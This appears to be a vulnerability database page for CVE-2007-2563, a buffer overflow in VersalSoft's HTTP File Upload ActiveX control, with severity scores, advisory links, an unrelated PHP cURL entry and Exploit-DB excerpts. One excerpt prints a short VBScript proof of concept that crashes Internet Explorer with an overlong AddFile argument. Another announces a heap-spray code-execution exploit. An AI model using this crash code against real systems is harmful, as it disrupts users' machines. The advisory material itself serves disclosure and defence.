CVE-2007-2563
Published 2007-05-09
CVE-2007-2563: Buffer overflow in the AddFile function in VersalSoft HTTP File Upload ActiveX control (UFileUploaderD.dll) allows remote attackers to execute arbitrary code…
Priority P343 · critical · 9.3 · CVSS 2.0
AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 7.22% (93.5th percentile)
Buffer overflow in the AddFile function in VersalSoft HTTP File Upload ActiveX control (UFileUploaderD.dll) allows remote attackers to execute arbitrary code via a long argument.
CVSS provenance
nvd · v2.0 · 9.3 · CRITICAL · AV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat · 2.1 · LOW
GHSA
GHSA-h7pj-cwh9-5339: Buffer overflow in the AddFile function in VersalSoft HTTP File Upload ActiveX control (UFileUploaderD
ghsa_unreviewed·2022-05-01
CVE-2007-2563 [HIGH] GHSA-h7pj-cwh9-5339: Buffer overflow in the AddFile function in VersalSoft HTTP File Upload ActiveX control (UFileUploaderD
Red Hat
php: curl safe mode bypass
vendor_redhat·2008-01-22·CVSS 2.1
CVE-2007-4850 [LOW] php: curl safe mode bypass
curl/interface.c in the cURL library (aka libcurl) in PHP 5.2.4 and 5.2.5 allows context-dependent attackers to bypass safe_mode and open_basedir restrictions and read arbitrary files via a file:// request containing a \x00 sequence, a different vulnerability than CVE-2006-2563.
Statement: We do not consider these to be security issues. For more details see https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=169857#c1 and https://www.php.net/security-note.php
No detection rules found.
Exploit-DB
Versalsoft HTTP File Uploader - 'AddFile()' Remote Buffer Overflow
exploitdb·2007-07-19
CVE-2007-2563 Versalsoft HTTP File Uploader - 'AddFile()' Remote Buffer Overflow
---
Versalsoft HTTP File Uploader (UFileUploaderD.dll v. 6.0.0.38) "AddFile()" method
Remote Buffer Overflow Exploit (Heap Spray Technique)
url: http://en.versalsoft.com/
price: from $59.95 to $799.95
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
This exploit executes calc.exe
Exploit-DB
Versalsoft HTTP File Uploader - ActiveX 6.36 AddFile Remote Denial of Service
exploitdb·2007-05-07
CVE-2007-2563 Versalsoft HTTP File Uploader - ActiveX 6.36 AddFile Remote Denial of Service
---
2007/05/07
Versalsoft HTTP File Uploader (UFileUploaderD.dll) 'AddFile' method Buffer Overflow
url: http://en.versalsoft.com/
price: from $59.95 to $799.95
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
Try only 1500 characters (or less) to see IE crash.
Sub tryMe
    on error resume next
    arg1 = String (4000,"A")
    target.AddFile arg1
End Sub
Sub QuoteMe
    Dim MyMsg
    MyMsg = MsgBox("I'm coming down with a fever" & vbCrLf & _
                   "I'm really out to sea" & vbCrLf & _
                   "This kettle is boiling over" & vbCrLf & _
                   "I think I'm a banana tree", 64, "2007/05/07 - Versalsoft HTTP File Uploader")
End Sub
As y
http://moaxb.blogspot.com/2007/05/moaxb-07-versalsoft-http-file-uploader.html
http://osvdb.org/34339
http://secunia.com/advisories/25156
http://www.securityfocus.com/bid/23853
http://www.shinnai.altervista.org/moaxb/20070507/ufile.txt
http://www.vupen.com/english/advisories/2007/1672
https://exchange.xforce.ibmcloud.com/vulnerabilities/34123
Published: 2007-05-09